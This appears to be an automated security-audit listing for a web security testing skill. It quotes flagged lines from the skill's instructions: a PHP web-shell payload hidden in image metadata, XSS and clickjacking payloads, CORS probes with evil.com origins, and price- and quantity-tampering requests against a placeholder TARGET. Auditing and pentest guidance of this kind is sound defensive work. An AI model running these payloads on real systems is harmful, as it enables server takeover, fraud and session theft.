wstg-logic-client-api

Facilitates comprehensive business logic, client-side, and API security testing to identify vulnerabilities and ensure robust application security.

Security score: 0/100

The wstg-logic-client-api skill was audited on May 24, 2026, and 77 security issues were found across 3 threat categories, including 1 high-severity finding. Review the findings below before installing.

Security Issues

All findings are in SKILL.md; each entry gives the severity, the finding title, the line number and the flagged line.

high (1 finding)

  Eval function call - arbitrary code execution
    line 118:  eval()

medium (34 findings)

  System command execution
    line 84:   # Create with: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

  Curl to non-GitHub URL (33 findings)
    line 16:   curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":-1,"price":100}'
    line 19:   curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":0.001}'
    line 22:   curl -X POST https://TARGET/api/checkout -d '{"item_id":1,"price":0.01}'
    line 25:   curl -X POST https://TARGET/api/checkout -d '{"amount":100,"currency":"JPY"}'
    line 29:   curl -X POST https://TARGET/api/apply-coupon -d '{"code":"SAVE50","code":"SAVE50"}'
    line 39:   curl -s -H "Cookie: session=TOKEN" https://TARGET/checkout/confirm
    line 42:   curl -X POST https://TARGET/checkout -d '{"step":3,"complete":true}'
    line 60:   curl -s -X POST https://TARGET/api/redeem \
    line 67:   curl -s -X POST https://TARGET/api/vote -d '{"post_id":1}' \
    line 80:   curl -X POST https://TARGET/upload \
    line 89:   curl -X POST https://TARGET/upload -F "[email protected]"
    line 170:  curl -sI https://TARGET | grep -i "x-frame-options\|content-security-policy"
    line 199:  curl -sI https://TARGET/api/data -H "Origin: https://evil.com" | grep -i "access-control"
    line 204:  curl -sI https://TARGET/api/data -H "Origin: null" | grep -i "access-control"
    line 208:  curl -sI https://TARGET/api/data -H "Origin: https://evil.TARGET" | grep -i "access-control"
    line 211:  curl -sI https://TARGET/api/data -H "Origin: https://TARGETevil.com" | grep -i "access-control"
    line 212:  curl -sI https://TARGET/api/data -H "Origin: https://evil-TARGET" | grep -i "access-control"
    line 225:  curl -s https://TARGET/swagger.json
    line 226:  curl -s https://TARGET/openapi.json
    line 227:  curl -s https://TARGET/api-docs
    line 228:  curl -s https://TARGET/swagger/v1/swagger.json
    line 229:  curl -s https://TARGET/v1/api-docs
    line 230:  curl -s https://TARGET/.well-known/openapi.json
    line 235:  curl -s -o /dev/null -w "%{http_code}" -X $method https://TARGET/api/endpoint
    line 240:  curl -s https://TARGET/api/v1/users
    line 241:  curl -s https://TARGET/api/v2/users
    line 242:  curl -s -H "Accept: application/vnd.api.v1+json" https://TARGET/api/users
    line 249:  curl -s -X POST https://TARGET/graphql \
    line 254:  curl -s -X POST https://TARGET/graphql \
    line 259:  curl -s -X POST https://TARGET/graphql \
    line 264:  curl -s -X POST https://TARGET/graphql \
    line 295:  GET_RESPONSE=$(curl -s https://TARGET/api/profile -H "Cookie: session=TOKEN")
    line 298:  curl -X PUT https://TARGET/api/profile \

low (42 findings)

  External URL reference (42 findings)
    line 16:   curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":-1,"price":100}'
    line 19:   curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":0.001}'
    line 22:   curl -X POST https://TARGET/api/checkout -d '{"item_id":1,"price":0.01}'
    line 25:   curl -X POST https://TARGET/api/checkout -d '{"amount":100,"currency":"JPY"}'
    line 29:   curl -X POST https://TARGET/api/apply-coupon -d '{"code":"SAVE50","code":"SAVE50"}'
    line 39:   curl -s -H "Cookie: session=TOKEN" https://TARGET/checkout/confirm
    line 42:   curl -X POST https://TARGET/checkout -d '{"step":3,"complete":true}'
    line 54:   -X POST https://TARGET/api/send-otp -d '{"phone":"1234567890"}'
    line 60:   curl -s -X POST https://TARGET/api/redeem \
    line 67:   curl -s -X POST https://TARGET/api/vote -d '{"post_id":1}' \
    line 80:   curl -X POST https://TARGET/upload \
    line 89:   curl -X POST https://TARGET/upload -F "[email protected]"
    line 92:   # <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
    line 145:  https://TARGET/page#<img src=x onerror=alert(1)>
    line 146:  https://TARGET/page#javascript:alert(1)
    line 149:  https://TARGET/page?q=<script>alert(1)</script>
    line 150:  https://TARGET/search?term=test" onmouseover="alert(1)
    line 162:  // <iframe src="https://TARGET" id="target"></iframe>
    line 170:  curl -sI https://TARGET | grep -i "x-frame-options\|content-security-policy"
    line 174:  # <iframe src="https://TARGET/sensitive-action" style="opacity:0.1" width="500" height="500"></iframe>
    line 199:  curl -sI https://TARGET/api/data -H "Origin: https://evil.com" | grep -i "access-control"
    line 200:  # Vulnerable if: Access-Control-Allow-Origin: https://evil.com
    line 204:  curl -sI https://TARGET/api/data -H "Origin: null" | grep -i "access-control"
    line 208:  curl -sI https://TARGET/api/data -H "Origin: https://evil.TARGET" | grep -i "access-control"
    line 211:  curl -sI https://TARGET/api/data -H "Origin: https://TARGETevil.com" | grep -i "access-control"
    line 212:  curl -sI https://TARGET/api/data -H "Origin: https://evil-TARGET" | grep -i "access-control"
    line 225:  curl -s https://TARGET/swagger.json
    line 226:  curl -s https://TARGET/openapi.json
    line 227:  curl -s https://TARGET/api-docs
    line 228:  curl -s https://TARGET/swagger/v1/swagger.json
    line 229:  curl -s https://TARGET/v1/api-docs
    line 230:  curl -s https://TARGET/.well-known/openapi.json
    line 235:  curl -s -o /dev/null -w "%{http_code}" -X $method https://TARGET/api/endpoint
    line 240:  curl -s https://TARGET/api/v1/users
    line 241:  curl -s https://TARGET/api/v2/users
    line 242:  curl -s -H "Accept: application/vnd.api.v1+json" https://TARGET/api/users
    line 249:  curl -s -X POST https://TARGET/graphql \
    line 254:  curl -s -X POST https://TARGET/graphql \
    line 259:  curl -s -X POST https://TARGET/graphql \
    line 264:  curl -s -X POST https://TARGET/graphql \
    line 295:  GET_RESPONSE=$(curl -s https://TARGET/api/profile -H "Cookie: session=TOKEN")
    line 298:  curl -X PUT https://TARGET/api/profile \

Scanned on May 24, 2026
GitHub stars: 283
Category: development
Updated: May 29, 2026
Author: CyberStrike (us/CyberStrike)